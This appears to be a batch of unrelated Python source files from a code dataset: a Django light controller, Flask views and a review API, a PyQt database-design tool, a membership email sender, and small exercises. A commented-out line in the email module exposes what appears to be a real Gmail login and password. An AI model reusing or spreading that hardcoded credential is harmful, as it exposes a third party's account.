join(escaped_values))\r\n self._insert = True\r\n\r\n self._dirty.clear()\r\n return await mysql.execute(sql)\r\n\r\n","sub_path":"python/common/orm.py","file_name":"orm.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"162196683","text":"import os\nimport sys\nfrom typing import Union\nfrom datetime import datetime\nimport django\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"plant_kiper.settings\")\nsys.path.insert(0, os.path.abspath(\"..\"))\ndjango.setup()\n\nfrom plant_kiper.settings import controller_logger, CONTROLLERS_LOOP_EVERY\nfrom core.controller import BaseTimeRangeController\nfrom plant_core.models import PlantSettings, UvLight\n\n# give a name for controlled device\n# for printing / logging purpose\nCONTROLLED_DEVICE: str = \"uv-light\"\n\n# Print template\n# generic template for logging/print (for log remove datetime_now)\nPRINT_TEMPLATE = (\n \"[INFO] [{device}] ; \"\n \"start_at={light_start_at} ; \"\n \"end_at={light_end_at} ; \"\n \"{_action}\"\n)\n\nfirst_loop: bool = True\nlast_action: Union[int, None] = None\n\n\ndef main():\n global first_loop, last_action\n\n # Example of configuration dict returned\n # by PlantSettings.get_settings()\n # {'id': x,\n # 'plant_identifier': 'my bansaï ficus',\n # 'plant_type': 'ficus',\n # 'air_temperature': 22.0,\n # 'air_hygrometry': 50.0,\n # 'air_co2_ppm': 5500.0,\n # 'soil_hygrometry': 52.0,\n # 'light_start': datetime.time(19, 10),\n # 'light_end': datetime.time(19, 30)}\n plant_settings: dict = PlantSettings.get_settings()\n\n start_at = plant_settings[\"light_start\"]\n end_at = plant_settings[\"light_end\"]\n\n # Create time based controller\n uv_io_ctl = BaseTimeRangeController(start_at, end_at)\n\n # set current time\n uv_io_ctl.set_current_time(datetime.now().time())\n # Get action\n action: int = uv_io_ctl.action\n # init last_action for init\n if first_loop:\n first_loop = False\n last_action = action\n controller_logger.info(\n PRINT_TEMPLATE.format(\n device=CONTROLLED_DEVICE,\n light_start_at=start_at,\n light_end_at=end_at,\n _action=action,\n ),\n extra={\"tags\": {\"controller\": CONTROLLED_DEVICE}},\n )\n UvLight.set_power_status(action)\n elif action != last_action:\n last_action = action\n controller_logger.info(\n PRINT_TEMPLATE.format(\n device=CONTROLLED_DEVICE,\n light_start_at=start_at,\n light_end_at=end_at,\n _action=action,\n ),\n extra={\"tags\": {\"controller\": CONTROLLED_DEVICE}},\n )\n UvLight.set_power_status(action)\n\n\nif __name__ == \"__main__\":\n controller_logger.warning(\n f\"[WARNING] [{CONTROLLED_DEVICE}] device debug mode, \"\n f\"use controller/run.py to load controller\",\n extra={\"tags\": {\"controller\": CONTROLLED_DEVICE}},\n )\n while True:\n main()\n","sub_path":"controllers/light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"247215675","text":"from flask import render_template, redirect, request\n\nimport app.wordlists as wordlists\nfrom app import app\nfrom app.forms import JobAdForm\nfrom app.models import JobAd, TranslatedWordlist\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef home():\n form = JobAdForm()\n if request.method == \"POST\" and form.validate_on_submit():\n ad = JobAd(form.texttotest.data, form.language.data)\n return redirect(\"results/{0}\".format(ad.hash))\n return render_template(\n \"home.html\", form=form, 
number_of_languages=len(wordlists.__all__)\n )\n\n\n@app.route(\"/about\")\ndef about():\n language = request.values.get(\"language\")\n if language not in wordlists.all_lists.keys():\n language = \"en\"\n return render_template(\n \"about.html\",\n language_code=language,\n language_name=wordlists.all_lists[language][\"language_name\"],\n masculine_coded_words=wordlists.all_lists[language][\"masculine_coded_words\"],\n feminine_coded_words=wordlists.all_lists[language][\"feminine_coded_words\"],\n domain=request.headers.get(\"Host\"),\n )\n\n\n@app.route(\"/results/\")\ndef results(ad_hash):\n job_ad = JobAd.query.get_or_404(ad_hash)\n masculine_coded_words, feminine_coded_words = job_ad.list_words()\n name, code, source = TranslatedWordlist.get_language_name_and_source(\n job_ad.language\n )\n return render_template(\n \"results.html\",\n job_ad=job_ad,\n masculine_coded_words=masculine_coded_words,\n masculine_coded_word_count=job_ad.masculine_word_count,\n feminine_coded_words=feminine_coded_words,\n feminine_coded_word_count=job_ad.feminine_word_count,\n explanation=job_ad.provide_explanation(),\n language_name=name,\n language_code=code,\n source=source,\n domain=request.headers.get(\"Host\"),\n )\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n return render_template(\"404.html\"), 404\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"476875794","text":"#\n# setup.py\n# Nazareno Bruschi \n#\n# Copyright (C) 2019-2020 University of Bologna\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n# If is 1 only the selected-below kernel is created (SINGLE KERNEL SOLUTION). Otherwise, all kernels are created (ALL KERNELS SOLUTION)\n\nSINGLE_KERNEL = 1\n\n# Select layer dimensions from supported ones:\n\n# -> input channels:\n# - all values if less precision between ifmaps and weights is INT8\n# - multiples of 2 if less precision between ifmaps and weights is INT4\n# - multiples of 4 if less precision between ifmaps and weights in INT2\n# -> output channels:\n# - all values if less precision is INT8\n# - multiples of 2 for uint4 output activations precision\n# - multiples of 4 for uint2 output activations precision\n# -> input/output activations:\n# - all values for dim_x\n# - all values for dim_y\n\nTYPE_OF_KERNEL = 'pointwise'\n\n# Select from the supported ones:\n\n# -> pointwise, depthwise, linear_no_quant, linear_quant\n\n# If SINGLE_KERNEL = 0 these will be ignored. 
Otherwise, select the possibilities from the supported ones\n#\n# -> input activations precision:\n# - 8, 4, 2\n# -> output activations precision:\n# - 8, 4, 2\n# -> weights precision:\n# - 8, 4, 2\n# -> quantization method:\n# - shift_clip\n\nin_precision = 8\nwt_precision = 8\nout_precision = 8\nquantization_type = 'shift_clip'\n\n# if depthwise CH_IM_IN must be equal to CH_IM_OUT\nDIM_IM_IN_X = 8\nDIM_IM_IN_Y = 8\nCH_IM_IN = 8\nDIM_IM_OUT_X = 8\nDIM_IM_OUT_Y = 8\nCH_IM_OUT = 4\n# if is not linear\nDIM_KERNEL_X = 3\nDIM_KERNEL_Y = 3\nPADDING_Y_TOP = 1\nPADDING_Y_BOTTOM = 1\nPADDING_X_LEFT = 1\nPADDING_X_RIGHT = 1\nSTRIDE_X = 1\nSTRIDE_Y = 1\n# Quantization and bias paramenters\nBIAS_SHIFT = 0\nOUT_MULT = 10","sub_path":"mixed/scripts/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"218107026","text":"import sys\nimport json\nimport copy\n\n\n\nfrom PyQt5.QtWidgets import (QMainWindow, QApplication, QWidget, QPushButton, QLabel, QFileDialog, QTableWidget,\n\n QAction, QLineEdit, QMessageBox, QVBoxLayout,QVBoxLayout, QGroupBox,QTextEdit, QFormLayout, QPlainTextEdit,QTableWidgetItem)\n\nfrom PyQt5.QtGui import QIcon\n\nfrom PyQt5.QtCore import pyqtSlot\n\n#Clases desarrolladas\n\nfrom Relation import Relation\n\nfrom funcdep import FuncDep\n\n\n\n#Variables Globales\n\n#Instancia relacion con listas vacias de atributos y dependencias\n\n#r = Relation(Attributes,FunctionalDependences)\n\nr = Relation(list(),list())\n\ndescriptors = []\n\nfileNameJson = \"\"\n\nc = []\n\ndataOutJson = {}\n\natributos = []\n\ndfs = []\n\ndecriptoresList = []\n\ndata = {}\n\n\n\nclass App(QMainWindow):\n\n \n\n def __init__(self):\n\n super().__init__()\n\n self.title = 'Database designer: Closure and Minimal Cover'\n\n self.left = 100\n\n self.top = 100\n\n self.width = 900\n\n self.height = 600\n\n #INICIO\n\n self.initUI()\n\n \n\n def initUI(self):\n try:\n self.setWindowTitle(self.title)\n\n self.setGeometry(self.left, self.top, self.width, self.height)\n\n \n\n mainMenu = self.menuBar() \n\n fileMenu = mainMenu.addMenu('File')\n\n uploadMenu = mainMenu.addMenu('Archivo')\n\n \n\n exitButton = QAction(QIcon('exit24.png'), 'Exit', self)\n\n exitButton.setShortcut('Ctrl+Q')\n\n exitButton.setStatusTip('Exit application')\n\n exitButton.triggered.connect(self.close)\n\n # exitButton.clicked.connect(self.on_click)\n\n fileMenu.addAction(exitButton)\n\n\n\n uploadFileButton = QAction(QIcon('exit24.png'), 'Subir archivo', self)\n\n uploadFileButton.triggered.connect(self.alert) \n\n uploadMenu.addAction(uploadFileButton)\n\n\n\n #Crea los labels\n\n self.labelAtr = QLabel(\"Atributos\", self)\n\n self.labelAtr.move(20,40)\n\n self.labelAtr.resize(280,20)\n\n\n\n # Crea textbox\n\n self.textboxAtrs = QLineEdit(self)\n\n self.textboxAtrs.move(100, 40) \n\n self.textboxAtrs.setPlaceholderText(\"Ingrese los atributos separados por comas\")\n\n self.textboxAtrs.resize(400,20)\n\n\n\n self.labelDf = QLabel(\"Dependencias \", self)\n\n self.labelDf.move(20,70)\n\n self.labelDf.resize(280,20)\n\n \n\n # Crea textbox\n\n self.textboxDf = QLineEdit(self)\n\n self.textboxDf.move(100, 70) \n\n self.textboxDf.setPlaceholderText(\"Ingrese las dependencias de la forma X->Y,Z;A,B->Z,X\")\n\n self.textboxDf.resize(400,20)\n\n\n\n self.labelDecriptor = QLabel(\"Decriptores\", self)\n\n self.labelDecriptor.move(20,100)\n\n self.labelDecriptor.resize(280,20)\n\n \n\n # Crea textbox\n\n 
self.textboxDecriptor = QLineEdit(self)\n\n self.textboxDecriptor.move(100, 100) \n\n self.textboxDecriptor.setPlaceholderText(\"Ingrese el decriptor\")\n\n self.textboxDecriptor.resize(400,20)\n\n\n # Crea boton para calcular recubrimiento mínomi\n self.buttonSaveJson = QPushButton('Calculo de clave', self)\n self.buttonSaveJson.move(20,275)\n self.buttonSaveJson.resize(300,32)\n self.buttonSaveJson.clicked.connect(self.calculoClave)\n\n \n\n # Crea a button in the window\n\n self.buttonCalculate = QPushButton('Calcular cierre de los inputs', self)\n\n self.buttonCalculate.resize(300,32)\n\n self.buttonCalculate.move(20,240)\n\n self.buttonCalculate.clicked.connect(self.clickCalculate)\n\n \n\n\n\n # Crea textArea\n\n self.textArea = QPlainTextEdit(self)\n\n self.textArea.setPlaceholderText(\"Resultados\")\n\n self.textArea.move(350,350)\n\n self.textArea.resize(400,200)\n\n\n\n # Crea a button in the window\n\n self.buttonSaveJson = QPushButton('Calcular cierre del descriptor (Json)', self)\n\n self.buttonSaveJson.move(20,135)\n\n self.buttonSaveJson.resize(300,32)\n\n self.buttonSaveJson.clicked.connect(self.clickSaveJson)\n\n\n\n\n\n # Crea boton para calcular recubrimiento mínomi\n\n self.buttonSaveJson = QPushButton('Recubrimiento mínimo', self)\n\n self.buttonSaveJson.move(20,170)\n\n self.buttonSaveJson.resize(300,32)\n\n self.buttonSaveJson.clicked.connect(self.recubrimientoMinimo)\n \n # Crea boton para borrar los datos\n\n self.buttonSaveJson = QPushButton('Borrar ', self)\n\n self.buttonSaveJson.move(20,205)\n\n self.buttonSaveJson.resize(300,32)\n\n self.buttonSaveJson.clicked.connect(self.resetVarClean)\n\n\n\n # Crea textArea\n\n self.textAreaJson = QPlainTextEdit(self)\n\n self.textAreaJson.setPlaceholderText(\"Json\")\n\n self.textAreaJson.move(350,135)\n\n self.textAreaJson.resize(400,200)\n\n self.show()\n except:\n QMessageBox.question(self, 'Alerta', \"Error\", QMessageBox.Ok, QMessageBox.Ok)\n \n\n\n @pyqtSlot()\n\n def clickCalculate(self):\n\n try:\n\n if self.textboxDecriptor.text() != \"\":\n\n self.resetVar()\n\n self.textArea.clear()\n\n atrs = self.textboxAtrs.text()\n\n df = self.textboxDf.text()\n\n strDescarga = self.calculateClosureFromInputs(atrs, df)\n\n self.textArea.appendPlainText(strDescarga)\n\n else:\n\n QMessageBox.question(self, 'Alerta', \"Debe ingresar atributos, dependencias y el decriptor\", QMessageBox.Ok, QMessageBox.Ok)\n\n except:\n QMessageBox.question(self, 'Alerta', \"Error\", QMessageBox.Ok, QMessageBox.Ok)\n\n \n\n @pyqtSlot()\n\n def clickSaveJson(self):\n\n try:\n\n if self.textboxDecriptor.text() == \"\":\n\n QMessageBox.question(self, 'Alerta', \"Debe ingresar el descriptor\", QMessageBox.Ok, QMessageBox.Ok)\n\n elif self.textAreaJson.toPlainText() == \"\": \n\n QMessageBox.question(self, 'Alerta', \"Seleccione un archivo json\", QMessageBox.Ok, QMessageBox.Ok)\n\n else:\n\n file = open(self.fileNameJson,\"w\") \n\n file.write(self.textAreaJson.toPlainText()) \n\n file.close()\n\n self.calculateClosureFromJson(self.fileNameJson)\n except:\n QMessageBox.question(self, 'Alerta', \"Error\", QMessageBox.Ok, QMessageBox.Ok)\n\n\n\n def resetVarClean(self):\n \n global r,dfs,descriptors,atributos,c,data,dataOutJson,decriptoresList\n \n r = Relation(list(),list())\n \n r.setAttributes(list())\n \n r.setDependences(list())\n \n descriptors = []\n \n c = []\n \n dataOutJson = {}\n \n atributos = []\n \n dfs = []\n \n decriptoresList = []\n \n data = {}\n self.textAreaJson.clear()\n self.textArea.clear()\n \n \n \n \n\n def 
resetVar(self):\n\n global r,dfs,descriptors,atributos,c,data,dataOutJson,decriptoresList\n\n r = Relation(list(),list())\n\n r.setAttributes(list())\n\n r.setDependences(list())\n\n descriptors = []\n\n c = []\n\n dataOutJson = {}\n\n atributos = []\n\n dfs = []\n\n decriptoresList = []\n\n data = {}\n\n \n\n def alert(self):\n\n self.openFileNameDialog()\n\n\n\n def openFileNameDialog(self): \n\n options = QFileDialog.Options()\n\n options |= QFileDialog.DontUseNativeDialog\n\n fileName, _ = QFileDialog.getOpenFileName(self,\"QFileDialog.getOpenFileName()\", \"\",\"All Files (*);;Python Files (*.py)\", options=options)\n\n if fileName:\n\n self.fileNameJson = fileName\n\n self.setJsonTextArea(fileName)\n\n #self.calculateClosureFromJson(fileName)\n\n \n\n\n\n def calculateClosureFromInputs(self, atribs, depends):\n\n try:\n atributos = atribs.strip().split(\",\")\n\n \n\n for atTmp in atributos:\n\n r.addAttribute(atTmp)\n\n \n\n dfs = []\n\n dependsPlit = depends.strip().split(\";\")\n\n for dependencias in dependsPlit:\n\n dependDescrip = dependencias.strip().split('->')\n\n\n\n implicantes = []\t\t\n\n for implicante in dependDescrip[0].strip().split(\",\"):\n\n implicantes.append(implicante)\n\n\n\n print(dependDescrip[1].strip().split(\",\"))\n\n\n\n implicados = []\t\t\n\n for implicado in dependDescrip[1].strip().split(\",\"):\n\n implicados.append(implicado)\n\n \n\n fd = FuncDep(list(implicantes),list(implicados))\n\n dfs.append(fd)\n\n \n\n r.setDependences(dfs)\n\n print (\"Dependencias:\")\n\n for d in r.getDependences():\n\n print(d.getImplicantes(),\"->\",d.getImplicados())\n\n\n\n self.calculateClosureWithDescriptors()\n except:\n QMessageBox.question(self, 'Alerta', \"Error\", QMessageBox.Ok, QMessageBox.Ok)\n\n\n\n def setJsonTextArea(self,fileName):\n\n fileEdit = open(fileName, \"r\")\n\n self.textAreaJson.appendPlainText(fileEdit.read()) \n\n fileEdit.close() \n\n \n\n def calculateClosureFromJson(self,fileName,getRObject = False):\n\n try:\n with open(fileName) as file:\n\n data = json.load(file)\n\n \n\n for atTmp in data['attributes']:\n\n r.addAttribute(atTmp)\n\n \n\n for deps in data['dependences']:\n\n fd = FuncDep(list(deps['implicante']),list(deps['implicado']))\n\n dfs.append(fd)\n\n r.setDependences(dfs)\n\n \n\n if(getRObject == True):\n\n return r\n\n else:\n\n self.calculateClosureWithDescriptors()\n\n except:\n QMessageBox.question(self, 'Alerta', \"Error\", QMessageBox.Ok, QMessageBox.Ok)\n\n def calculoClave(self):\n try:\n strResult =\"\";\n #Obtiene el grupo de dependencias con el algoritmo del cierre mínimo calculado\n R = self.recubrimientoMinimo(True)\n m2 = []\n l1 = []\n \n T = R.getAttributes();\n #Halla la resta entre T y V (Z)\n Z = R.restaAttrImplicados();\n\n strResult += \"L = \"+R.printDependences()+\"\\n\\n\";\n\n strResult += \"T = \";\n strResult += ''.join(str(e) for e in T);\n\n strResult += '\\nZ: ';\n strResult += ''.join(str(e) for e in Z);\n\n strResult += '\\nZ+: ';\n strResult += ''.join(str(e) for e in R.closure(Z));\n\n #si Z+ = T entonces es una lave Unica\n uniqueKey = R.esLlaveUnica(R.closure(Z));\n\n\n if uniqueKey == True:\n strResult += '\\nClave única: ';\n strResult += ''.join(str(e) for e in T);\n\n \n #Paso 2 Llaves candidatas , concatena a Z\n pos=0;\n Z_cierre = R.closure(Z)\n\n\n for tTmp in R.getAttributes():\n zTmp = copy.deepcopy(Z_cierre);\n zTmp.append(tTmp)\n\n l1.append([zTmp,pos])\n pos = pos + 1\n\n \n \n #Paso 3\n strResult += '\\nLlaves candidatas M2\\n'\n for lTmp in l1:\n cantTmp = lTmp[1]+1\n\n for 
lTmp2 in range(cantTmp,len(l1)):\n lTmp3 = copy.deepcopy(lTmp[0]);\n lTmp3.append(T[cantTmp]);\n\n Rtemp = copy.deepcopy(R);\n\n cierrelTmp3 = Rtemp.closure(lTmp3)\n\n\n if(R.comparaListas(lTmp3,cierrelTmp3)):\n strResult += \"\\t\"\n strResult += ''.join(str(e) for e in lTmp3);\n strResult += \"\\n\"\n \n cantTmp = cantTmp+1\n\n\n\n\n self.textArea.setPlainText(strResult)\n except:\n QMessageBox.question(self, 'Alerta', \"Error\", QMessageBox.Ok, QMessageBox.Ok)\n\n #Calcula el recubrimiento mínimo, crea el listado de descriptores a partir de la función calculateClosureFromJson\n\n def recubrimientoMinimo(self,getList=False):\n\n try:\n\n #Verifica que se haya cargado un JSON\n\n if self.textAreaJson.toPlainText() == \"\":\n\n QMessageBox.question(self, 'Alerta', \"Cargue un archivo json\", QMessageBox.Ok, QMessageBox.Ok)\n\n else:\n\n file = open(self.fileNameJson,\"w\") \n\n file.write(self.textAreaJson.toPlainText()) \n\n file.close()\n\n #Obtiene el objeto de la lista con las dependencias, y aplca el algoritmo de recubrimiento mínimo\n\n r2 = self.calculateClosureFromJson(self.fileNameJson,True)\n\n\n\n #Paso 1 para todo A->Y divide las dependencias donde |Y| > 1\n\n self.textArea\n\n \n\n strResult = \"\"\n\n r2.divideDependencias()\n\n print(\"L1 = \",r2.printDependences())\n\n strResult += \"L1 = \"+r2.printDependences()+\"\\n\\n\";\n\n\n\n \n\n r2.elementosExtranos()\n\n strResult += \"L2 = \"+r2.printDependences()+\"\\n\\n\";\n\n\n\n r2.elmiinaRedundancias()\n\n strResult += \"L3 = \"+r2.printDependences()+\"\\n\\n\";\n\n \n\n if(getList == True):\n return r2\n else:\n self.textArea.setPlainText(strResult)\n \n except:\n QMessageBox.question(self, 'Alerta', \"Error\", QMessageBox.Ok, QMessageBox.Ok)\n\n\n\n def calculateClosureWithDescriptors(self):\n\n try:\n\n decriptores = self.textboxDecriptor.text()\n\n\n\n decriptoresList = decriptores.strip().split(',')\n\n for decriptor in decriptoresList:\n\n descriptors.append(decriptor)\n\n\n\n print(\"Cierre para:\",descriptors)\n\n print(\"Resultado:\")\n\n c = r.closure(descriptors)\n\n \n\n print(c)\n\n \n\n result = \"cierre: \"\n\n for i in range(0, len(c)):\n\n if i == (len(c)-1):\n\n result += c[i];\n\n else:\n\n result += c[i]+\",\";\n\n \n\n self.textArea.setPlainText(result)\n\n \n\n dataOutJson['descriptors'] = descriptors\n\n dataOutJson['closure'] = c\n\n \n\n with open('output.json', 'w') as outFile:\n\n json.dump(dataOutJson, outFile)\n\n \n\n self.resetVar()\n \n except:\n QMessageBox.question(self, 'Alerta', \"Error\", QMessageBox.Ok, QMessageBox.Ok)\n\n \n\nif __name__ == '__main__':\n\n app = QApplication(sys.argv)\n\n ex = App()\n\n sys.exit(app.exec_())\n","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":15323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"517859296","text":"\n\nfrom xai.brain.wordbase.nouns._wrinkle import _WRINKLE\n\n#calss header\nclass _WRINKLES(_WRINKLE, ):\n\tdef __init__(self,): \n\t\t_WRINKLE.__init__(self)\n\t\tself.name = \"WRINKLES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"wrinkle\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_wrinkles.py","file_name":"_wrinkles.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"68435709","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\nimport math\n\nn=input('Digite o valor de n:')\nif n<=0:\n n=n*(-1)\ni=1\nj=n\ns=0\n\nwhile 
i<=n:\n s=s+(i/j)\n i=i+1\n j=j-1\nprint ('%.5f' %s)","sub_path":"moodledata/vpl_data/30/usersdata/68/9360/submittedfiles/atividade.py","file_name":"atividade.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"590745615","text":"from gluon import *\nfrom gluon.tools import Mail\nimport os\nfrom gluon.contrib.appconfig import AppConfig\n#from gluon.tools import Auth\n# -*- coding: utf-8 -*-\n# try something like\ndef join_email(mem_id, mem_first, address, folder, renew=False): \n #mail = auth.settings.mailer\n myconf = AppConfig(reload=True)\n mail = Mail()\n mail.settings.server = myconf.get('smtp.server')\n mail.settings.sender = myconf.get('smtp.sender')\n mail.settings.login = myconf.get('smtp.login')\n# mail.settings.tls = myconf.get('smtp.tls') or False\n# mail.settings.ssl = myconf.get('smtp.ssl') or False\n \n# mail = Mail()\n# mail.settings.server = 'smtp.gmail.com:587'\n# mail.settings.sender = 'wpa4membership@gmail.com'\n# mail.settings.login = 'wpa4membership@gmail.com:mbrsstand2gether'\n \n join = \"Thank you for joining Woodley Park Archers. \"\n if(renew == True): join = \"Thank you for renewing with Woodley Park Archers. \"\n htmlmsg = u\"\"\"
<img src=\"cid:photo\"/>\"\"\"\n    htmlmsg += \"Hi {},<br/>\".format(mem_first[0])\n    if(len(mem_id) == 1):\n        htmlmsg += join\n        htmlmsg += \"Your member number is {:06d}. \".format(mem_id[0])\n    else:\n        htmlmsg += join + \"<br/>\"\n        for i in range(len(mem_id)):\n            htmlmsg += \"{}'s member number is {:06d}.<br/>\".format(mem_first[i], mem_id[i])\n    htmlmsg += \"Please read the letter from our president below.<br/>\"\n    htmlmsg += \"Sam Amundson<br/>\"\n    htmlmsg += \"Membership Chair<br/>\"\n    htmlmsg += \"Woodley Park Archers<br/><br/>\"\n#    htmlmsg = self.textToHtml(text)\n    htmlmsg += \"\"\"<br/>\n WoodleyParkArchers.org<br/>\"\"\"\n    htmlmsg += \"\"\"<br/>\n Facebook: Woodley Park Archers<br/>\"\"\"\n    htmlmsg += \"\"\"\"\"\"\n    with open(os.path.join(folder, 'static', 'emailbody.txt'), 'r') as f:\n        for line in f:\n            htmlmsg += u\"\"\"<br/>{}<br/>
\"\"\".format(line.decode('utf-8'))\n htmlmsg += \"\"\"\"\"\"\n mail.send('sam.amundson@gmail.com', 'Woodley Park Archers Membership Confirmation', htmlmsg,\n attachments = mail.Attachment(os.path.join(folder, 'static', 'Header.png'), content_id='photo'),\n bcc=['sam_08123@yahoo.com'])\n return\n","sub_path":"mem1/modules/mem1email.py","file_name":"mem1email.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"31631502","text":"# n,m=[int(i) for i in input().split()]\n# a=[]\n# for i in range(n):\n# # mi,ri=[int(i) for i in input().split()]\n# a.append([int(i) for i in input().split()])\n# print(a)\n# a=[[2, 4], [2, 35], [1, 43], [2, 10]]\n\nn, m = [int(i) for i in input().split()]\nmi, ri = [], []\n\nfor i in range(n):\n a, b = [int(i) for i in input().split()]\n mi.append(a)\n ri.append(b)\ndp = [[0 for _ in range(m + 1)] for _ in range(n + 1)]\n\nfor i in range(1, n + 1):\n for j in range(1, m + 1):\n if mi[i - 1] > j:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = max(dp[i - 1][j - mi[i - 1]] + ri[i - 1], dp[i - 1][j]) #n个m分钟\nprint(dp[n][m])","sub_path":"笔试面试题/2020BISHI/公司笔试记录/新建文件夹/bili3.py","file_name":"bili3.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"27637450","text":"#!/usr/bin/python3\n\"\"\"\nthis text_indentation module contains only text_indentation()\n\"\"\"\n\n\ndef text_indentation(text):\n \"\"\"\n Print a text with 2 newlines after the characters: .?:\n \"\"\"\n if type(text) is not str:\n raise TypeError('text must be a string')\n cont = False\n for x in text.strip(' '):\n if cont:\n cont = False\n continue\n if x in '.?:':\n print('{}\\n\\n'.format(x), end='')\n cont = True\n else:\n print(x, end='')\n","sub_path":"0x07-python-test_driven_development/5-text_indentation.py","file_name":"5-text_indentation.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"568523291","text":"import os, sys\nimport unittest\nfrom porthole import config, ConnectionManager\nfrom porthole.models import metadata\nfrom tests.fixtures import test_metadata, create_fixtures\nfrom tests.test_ConnectionManager import TestConnectionManager\nfrom tests.test_Mailer import TestMailer\nfrom tests.test_SimpleWorkflow import TestSimpleWorkflow\nfrom tests.test_RelatedRecord import TestRelatedRecord\nfrom tests.test_Reports import TestBasicReport, TestGenericReport, TestReportRunner\nfrom tests.test_Queries import TestQueries, TestRowDict\nfrom tests.test_components import TestReportWriter, TestReportActiveChecker\nfrom tests.test_filters import TestResultFilter\n# Query Handlers\n# Time Helper\nfrom tests.test_WorkbookBuilder import TestWorkbookBuilder\n\n# Disable\ndef blockPrint():\n sys.stdout = open(os.devnull, 'w')\n\n\n# Restore\ndef enablePrint():\n sys.stdout = sys.__stdout__\n\n\ndef setup_test_db():\n db = config['Default']['database']\n if config[db]['rdbms'] == 'sqlite':\n cm = ConnectionManager(db)\n cm.connect()\n metadata.create_all(cm.engine)\n test_metadata.create_all(cm.engine)\n create_fixtures(cm)\n cm.close()\n\n\ndef teardown_test_db():\n try:\n os.unlink('test.db')\n except FileNotFoundError:\n pass\n\n\ndef main():\n # blockPrint()\n\n # Select all of your test classes here.\n test_classes_to_run = [\n TestConnectionManager,\n TestSimpleWorkflow,\n TestRelatedRecord,\n TestBasicReport,\n 
TestGenericReport,\n        TestMailer,\n        TestReportRunner,\n        TestQueries,\n        TestRowDict,\n        TestReportWriter,\n        TestReportActiveChecker,\n        TestResultFilter,\n        TestWorkbookBuilder\n    ]\n\n    # Setup\n    loader = unittest.TestLoader()\n    # # Process and load test suites\n    suites_list = [loader.loadTestsFromTestCase(test_class) for test_class in test_classes_to_run]\n    # Test all of the things!\n    executive_test_suite = unittest.TestSuite(suites_list)\n    unittest.TextTestRunner(verbosity=1).run(executive_test_suite)\n\n    # enablePrint()\n\n\nif __name__ == '__main__':\n    setup_test_db()\n    main()\n    teardown_test_db()\n","sub_path":"run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"98991103","text":"#!/usr/bin/python3\n\"\"\"\nroute for handling Review objects and operations\n\"\"\"\nfrom flask import jsonify, abort, request\nfrom api.v1.views import app_views, storage\nfrom models.review import Review\n\n\n@app_views.route(\"/places/<place_id>/reviews\", methods=[\"GET\"],\n                 strict_slashes=False)\ndef reviews_by_place(place_id):\n    \"\"\"\n    retrieves all Review objects by place\n    :return: json of all reviews\n    \"\"\"\n    review_list = []\n    place_obj = storage.get(\"Place\", str(place_id))\n\n    if place_obj is None:\n        abort(404)\n\n    for obj in place_obj.reviews:\n        review_list.append(obj.to_json())\n\n    return jsonify(review_list)\n\n\n@app_views.route(\"/places/<place_id>/reviews\", methods=[\"POST\"],\n                 strict_slashes=False)\ndef review_create(place_id):\n    \"\"\"\n    create Review route\n    :return: newly created Review obj\n    \"\"\"\n    review_json = request.get_json(silent=True)\n    if review_json is None:\n        abort(400, 'Not a JSON')\n    if not storage.get(\"Place\", place_id):\n        abort(404)\n    # verify user_id is present before looking the user up, to avoid a KeyError\n    if \"user_id\" not in review_json:\n        abort(400, 'Missing user_id')\n    if not storage.get(\"User\", review_json[\"user_id\"]):\n        abort(404)\n    if \"text\" not in review_json:\n        abort(400, 'Missing text')\n\n    review_json[\"place_id\"] = place_id\n\n    new_review = Review(**review_json)\n    new_review.save()\n    resp = jsonify(new_review.to_json())\n    resp.status_code = 201\n\n    return resp\n\n\n@app_views.route(\"/reviews/<review_id>\", methods=[\"GET\"],\n                 strict_slashes=False)\ndef review_by_id(review_id):\n    \"\"\"\n    gets a specific Review object by ID\n    :param review_id: review object id\n    :return: review obj with the specified id or error\n    \"\"\"\n\n    fetched_obj = storage.get(\"Review\", str(review_id))\n\n    if fetched_obj is None:\n        abort(404)\n\n    return jsonify(fetched_obj.to_json())\n\n\n@app_views.route(\"/reviews/<review_id>\", methods=[\"PUT\"],\n                 strict_slashes=False)\ndef 